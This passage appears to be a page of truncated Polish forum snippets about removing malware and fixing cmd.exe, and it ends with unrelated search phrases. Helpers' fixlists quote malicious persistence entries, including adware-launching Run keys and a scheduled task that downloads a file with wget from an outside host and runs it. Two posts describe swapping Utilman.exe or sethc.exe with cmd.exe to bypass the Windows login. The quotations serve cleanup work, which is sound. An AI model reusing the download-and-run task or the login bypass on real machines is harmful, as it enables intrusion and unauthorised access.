Usun z dysku jeszcze: C:\xo8wr9.exe Wklej do notatnika: REGEDIT4 [-HKEY_CURRENT_USER\software\microsoft\w... Zapisz jako fix.reg i uruchom. Jezeli masz wiecej partycji niz tylko C:\ to sprawdz na pozostalych czy nie ma plikow autorun, cmd i exe z losowa nazwa.
jeśli jest to plik wykonywalny exe możesz spróbować tak: start > uruchom > cmd naciśnij enter i wpisz taskkill /im <nazwa_programu.exe> /f | del <dysk:\katalog\nazwa_programu.exe>
http://lmgtfy.com/?q=unlock+file A najpierw spróbuj, czy z poziomu cmd nie da się: del plik
Witam win7 64bit ultimate Posiadam plik exe którego nie mogę usunąć, gdy probuję to zrobić wyskakuje komunikat o tym że potrzebuję uprawnień administratora aby usunąć plik. Próbowałem usunąć Unlockerem nic nie dało. Próbowałem tego: Start - (wpisz) - cmd - Prawy przycisk myszy na to i Uruchom jako administrator. Następnie wpisz polecenie net user administrator...
HKU\S-1-5-21-2604234434-2453601339-36352... [Shell] %comspec% <==== UWAGA HKU\S-1-5-21-2604234434-2453601339-36352... Processor: (at)mode 20,5 & tasklist /FI "IMAGENAME eq SoundMixer.exe" 2>NUL | find /I /N "SoundMixer.exe">NUL && exit & if exist "C:\Users\lenovo\AppData\Roamin...
Wykonaj Fixlist.txt dla FRST: CloseProcesses: CustomCLSID: HKU\S-1-5-21-676744006-1220416197-206704... -> C:\Users\DELL\AppData\Local\Microsoft\On... => Brak pliku Task: {06C7B67A-D737-4660-9587-EC1A02C90E1F} - System32\Tasks\{AC77F291-01D8-4EE8-AC4F-...
Otwórz notatnik i wklej: CloseProcesses: (SoundMixer) [Brak podpisu cyfrowego] C:\Users\Macian\AppData\Roaming\Microsof... HKU\S-1-5-21-4149949604-2322064665-64350... {40703b3a-9f5c-11e7-8066-408d5cc77d6c} - "H:\SETUP.EXE" HKU\S-1-5-21-4149949604-2322064665-64350... {40703b44-9f5c-11e7-8066-408d5cc77d6c}.....
Nie zamiesciles addition.txt. Sprobuj nagrac to co sie wyswietla na ekranie i uchwycic zawartosc okna cmd. Uzyj tez Process Explorer: https://technet.microsoft.com/pl-pl/sysi... i podaj jaki proces jest aktywny w chwili wyswietlenia tego okna.
Dyski sprawne. Usuń C:\FRST i to wszystko.
Wykonaj skrypt: :OTL IE - HKU\S-1-5-21-65817511-2009588810-3967907... "URL" = http://search.v9.com/web/?q={searchTerms... [2013/10/18 14:52:16 | 000,001,614 | ---- | M] () -- C:\Users\Svartetta\AppData\Roaming\mozil...
Usuń połączenie szerokopasmowe. Uruchom cmd.exe, wpisz ping 8.8.8.8 ping onet.pl ipconfig /all wydruki wklej so sekcji "spoiler"
Jak zwykle, sciaganie zainfekowanych torrentow... Fixlist.txt dla FRST: CloseProcesses: HKU\S-1-5-21-3282795588-353607401-307773... [xmefi] => cmd.exe /c start www.dongdonger.org (Brak pliku) <==== UWAGA HKLM\SOFTWARE\Policies\Mozilla\Firefox: Ograniczenia <==== UWAGA Task: {84648C79-C718-4780-BB72-DB9ADD37F0E6} - System32\Tasks\xmefi...
Nadal masz te same zainfekowane gry, wystarczylo ponownie instalowac z zainfekowanego obrazu i gotowe. Zreszta mogles sam usunac, skoro to to samo: HKU\S-1-5-21-2747494558-3499618735-30577... [Daniel] => cmd.exe /c start www.url-advertisement.org (Brak pliku) <==== UWAGA Task: {C0AC0474-B7FD-4D51-97A5-CF2E92CB90E8} - System32\Tasks\Daniel...
Odinstaluj: Adobe Reader 9.4.0 - Polish AVG Uzyj: http://www.avg.com/pl-pl/utilities i usun resztki po AVG. Zainstaluj http://ninite.com/foxit/ Obok frst.exe utworz plik fixlist.txt z zawartoscia: HKU\S-1-5-21-1177238915-630328440-725345... exefile => <===== ATTENTION! HKU\S-1-5-21-1177238915-630328440-725345...
Jeszcze to dopisz do fixlist: CHR StartupUrls: Default -> "hxxp://do-search.com/?type=hp&ts=143325... Task: {DA01C481-4818-48E2-A0D1-C48586E9DDAB} - System32\Tasks\Patryk => cmd.exe /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Win...
Usuń C:\FRST i zamknij temat.
Witam Mam zadanie: Na wirtualnej maszynie poprzez wiersz poleceń, zrobić sztuczkę z zamianą ułatwienia dostępu a wierszem poleceń.w folderze systemu windwows, w katalogu system32 skopiować cmd.exe jako cmd2.exe skopiować Utilman.exe jako Utilman2.exe usunąć cmd.exe zmienić nazwę Utilman2.exe na cmd.exe następnie uruchomić ponownie VM i podczas logowania...
Jak jest dobrze to usuń C:\FRST i zamknij temat klikają na dole na rozwiązano.
Fixlist.txt dla FRST: HKU\S-1-5-21-2442079519-700455851-157764... [CMD] => cmd.exe /c start http://adverttraff.org && exit <===== ATTENTION
Sprawdź dysk za pomocą GOODRAM Optimum SSD Tool. Na dole tu: https://www.goodram.com/do-pobrania/ Comodo wciąż widzę w logach. Jak chcesz może zostać. Usuń C:/FRST i to wszystko
Co drugi watek w tym dziale dotyczy tego samego, uzytkownik sciaga zainfekowane torrenty i mu sie dodaja DWA wpisy, ktore trzeba usunac, wystarczy je wyszukac w swoich logach, dodac do Fixlist i tyle. Fixlist.txt dla FRST: HKU\S-1-5-21-948480010-2211978577-208833... [janus] => cmd.exe /c start www.nemotrix.org (Brak pliku) <====...
Fixlist.txt dla FRST: HKU\S-1-5-21-4086642600-532969350-329080... [Michał] => cmd.exe /c start www.dongdonger.org (Brak pliku) <==== UWAGA Task: {8F9D9DAD-3D2F-4573-B404-72561D110E11} - System32\Tasks\Michał => C:\Windows\System32\cmd.exe [289792 2024-05-27] (Microsoft Windows -> Microsoft Corporation) -> /c reg add HKCU\Software\Microsoft\Windows\CurrentV...
Do usunięcia: O4 - HKUS\S-1-5-20\..\RunOnce: [nlpo_04] cmd.exe /C move /Y "%SystemRoot%\System32\syssetub.dll" "%SystemRoot%\System32\syssetup.dll" (User 'USŁUGA SIECIOWA') usuń HijackThisem >> Fix checked
Otwórz notatnik systemowy i wklej: Task: {984FEFA5-F75E-4631-B849-6B984D011832} - System32\Tasks\BVkc8TPPjG4ZkAnk8b8k0k => C:\Users\WLN\AppData\Roaming\BVkc8TPPjG4... <==== ATTENTION Task: C:\Windows\Tasks\BVkc8TPPjG4ZkAnk8b8k0k.... => C:\Users\WLN\AppData\Roaming\BVkc8TPPjG4... <==== ATTENTION HKLM-x32\...\Run: Plik...
Jak masz ochotę i czas to zrób tak: Ściągnij i zainstaluj wireshark-a. - Ustaw WIFI karty na automatycznie - usuń ip konfigurację za pomocą "ipconfig /release" z okna CMD.exe - uruchom wiresharka Menu/Capture/Options: [ ] Capture Packet in Promiscous Mode <= odznacz Interface: wybierze twoją karte Catpure Files/File: C:\wifi.cap klik [start] - w...
Otwórz notatnik systemowy i wklej: HKLM\...\Run: Plik zapisz pod nazwą fixlist.txt i umieść obok FRST w tym samym folderze. Uruchom jako administrator FRST i kliknij w Fix.
W pierwszej kolejności spróbuj naprawić system plików za pomocą polecenia w oknie cmd (zakładając że f: to literka twojego pendriva): chkdsk f: /F Neśli nie pomoże to spróbuj do sformatowania wykorzystać to : http://www.sysanalyser.com/sp27213.exe .
Niczego nie infekuje, dodaje tylko jeden wpis w sekcji run: HKU\S-1-5-21-2707468229-2512971462-... [CMD] => cmd.exe /c start http://adverttraff.org && exit <===== ATTENTION Programy tego nie wykrywaja dlatego, ze wpis zawiera wywolanie cmd.exe i adres strony, taki wpis moze byc poprawny, np: Run: [CMD] => cmd.exe...
Moze jednak warto usunac problem z ktorym autor sie zglosil? Fixlist.txt: Task: {43D7ED44-C3A6-4DDF-BA8B-494A5FDCB1F3} - System32\Tasks\Mateusz => cmd.exe /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Win... /f /v Mateusz /t REG_SZ /d "cmd.exe /c start www.exinariuminix.info" HKLM-x32\...\Run: [] => [X] HKU\S-1-5-21-1034609756-3911388992-85064...
Na Kolegi miejscu odinstalowałbym CCLeaner, chyba że komputer działa za szybko lub jest na nim za mało problemów - chyba że lubi się aplikacje, które bezsensownie obciążają komputer na starcie i wykonują nienadzorowane czynności w systemie - zarówno na plikach jak i w rejestrze systemowym - bez większych ograniczeń, z uprawnieniami administratora. Jest...
O31 - SafeBoot: AlternateShell - cmd.exe Co ty wyprawiasz? prawidłowe wpisy usuwasz? Tak, usunąłem to ze skryptu, nie zauważyłem SafeBoot: AlternateShell - cmd-brontok.exe - powinienem usunąć i zmienić na właśnie ten prawidłowy wpis.
Fixlist.txt dla FRST: HKU\S-1-5-21-3679979290-2153443247-34326... [CMD] => cmd.exe /c start http://adverttraff.org && exit <===== ATTENTION EmptyTemp: Po wykonaniu usun katalog C:\FRST i to wszystko.
Nie działa CMD.exe pojawia się czarna konsola i znika Użyłem AdwCleaner i malwarebytes .. wszystko z kwarantanny usunąłem
Nic dziwnego skoro krzychupar jak zwykle pominal jedyne wpisy, ktore mial usunac... Fixlist.txt: Task: {124470CD-6FC3-412A-A7C1-095B55600A6D} - System32\Tasks\elmoo => cmd.exe /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Win... /f /v elmoo /t REG_SZ /d "cmd.exe /c start www.dipladoks.org" HKU\S-1-5-21-2055453291-1949687632-30309...
W cmd wpisz: scanreg.exe Usuń urządzenie w manag. urządz. i pozwól aby wykryto je ponownie.
Fixlist.txt: HKU\S-1-5-21-3508317291-1703901792-17491... [rozek] => cmd.exe /c start www.dongdonger.org (Brak pliku) <==== UWAGA Task: {0FC9EE3A-8E32-48A3-9571-F5FE4561B1C5} - System32\Tasks\rozek => C:\Windows\system32\cmd.exe [376832 2025-06-12] (Microsoft Windows -> Microsoft Corporation) -> /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Win...
Wejdź Start->Uruchom wpisz cmd.exe Enter Następnie w wierszu poleceń wpisz netsh winsock reset Podaj nowe OTL i Extras
Otwórz Notatnik i wklej: HKLM-x32\...\Run: Plik zapisz pod nazwą fixlist.txt i umieść obok FRST w tym samym folderze. Uruchom FRST i kliknij w Fix.
Fixlist.txt dla FRST: HKU\S-1-5-21-164299106-1229341532-974486... [CMD] - cmd.exe /c start http://ooov.net && exit 2014-12-20 14:38 - 2014-12-20 14:38 - 00000000 ____D () C:\Users\Ja\AppData\Roaming\OpenCandy
cmd znów działa, dziękuję bardzo :) ciekawy jestem co spowodowało, albo mogło spowodować taki problem, bo pewnie możliwości jest... dużo :) Problemem było to HKU\S-1-5-21-2280216081-3305719645-37163... Usuń folder C:\FRST i to wszystko.
Trzeba jeszcze usunac zadanie, ktore to dopisuje. Wykonaj Fixlist.txt dla FRST: CloseProcesses: HKLM\...\Run: [] => [X] HKLM-x32\...\Run: [] => [X] HKU\S-1-5-21-2064116477-835206336-105349... [] => [X] HKU\S-1-5-21-2064116477-835206336-105349... [Dred] => cmd.exe /c start www.url-advertisement.org (Brak pliku)...
Odinstaluj: Odkurzacz SafeFinder Przeskanuj i usuń wszystko co znajdą (również z kwarantanny): https://pl.malwarebytes.com/ https://pl.malwarebytes.com/adwcleaner/ Malware powinien pomóc, ale taki fixlist udało mi się jeszcze stworzyć: HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ograniczenia <==== UWAGA (WZTeam -> MSFree Inc.)
Wykonaj Fixlist.txt dla FRST: CloseProcesses: HKU\S-1-5-21-1275922256-2207039110-29596... [MicrosoftEdgeAutoLaunch_19D7381C709EBFF... => "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.... --no-startup-window --win-session-start [4113488 2025-07-24] (Microsoft Corporation -> Microsoft Corporation) HKU\S-1-5-21-1275922256-2207039110-29596...
Witam, zapomniałem ostatnio hasła do komputera i w tym celu odpaliłem komputer ze zbootowanego pendrive i podmieniłem pliki sethc.exe z cmd.exe, zeby usunąć hasło. Po wszystkim w Kasperskym wyskakuje mi Trojan.Multi.Accesstr.ash, próbowałem ponownie podmienić pliki, tak jak było na początku, ale bezskutecznie. Co robić w takiej sytuacji? Poniżej wstawiam...
Otwórz notatnik systemowy i wklej: HKLM-x32\...\Run: Plik zapisz pod nazwą fixlist.txt i umieść obok FRST w tym samym folderze. Uruchom jako administrator FRST i kliknij w Fix.
Otwórz notatnik systemowy i wklej: Task: {024D2B1F-E3FD-4480-A24E-A137F47187DF} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://grogle.in/dat.bmp?data=rNeUiHGSrv... & start cmd /R dat.bmp <====...
Proponuję dla pewności dodać do fixlist: C:\Users\Bartek\AppData\Roaming\Micr... C:\Users\Bartek\AppData\Roaming\Micr... (at)Iceeye Po naprawie usuń C:\FRST i to wszystko.
wydaje mi się ze jak usuniesz przydział to następnym razem pyta o login/hasło np, z wiersza CMD.exe net use X: \\komputer1\przydzial_A /user:userA * <= pyta o hasło dla userA net use X: /del net use X:\\komputer1\przydzial_B /user:userB * <= pyta o hasło dla userB
Do wykonania Fixlist dla Kolegi*: HKU\S-1-5-21-2871605574-3145998984-26535... [Dan] => cmd.exe /c start www.dinoraptzor.org HKU\S-1-5-21-2871605574-3145998984-26535... [CCleaner Smart Cleaning] => C:\Program Files\CCleaner\CCleaner64.exe [23153344 2019-07-11] (Piriform Software...
Z kav miales dac TYLKO to co masz w Detected (czyli nic z tego co widze), a nie caly 1MB log.. Podlacz zainfekowany pendrive. CFScript.txt: File:: C:\yo2mq6.exe C:\v.cmd C:\xpbkh.com C:\uisvkqr.exe C:\y82td3td.com D:\yo2mq6.exe D:\v.cmd D:\xpbkh.com D:\uisvkqr.exe D:\y82td3td.com E:\yo2mq6.exe E:\v.cmd E:\xpbkh.com E:\uisvkqr.exe E:\y82td3td.com G:\autrun.inf...
aquastop usunąć messenger usunąć usunąć stroboskop
podcisnienie silniku zasilacz spada napięcie czarne poziome paski ekranie laptopa
Oznaczenie BBMoB - układ scalony czy urządzenie? Wycieraczki nie działają w Mercedes ML W163 - przyczyny i rozwiązania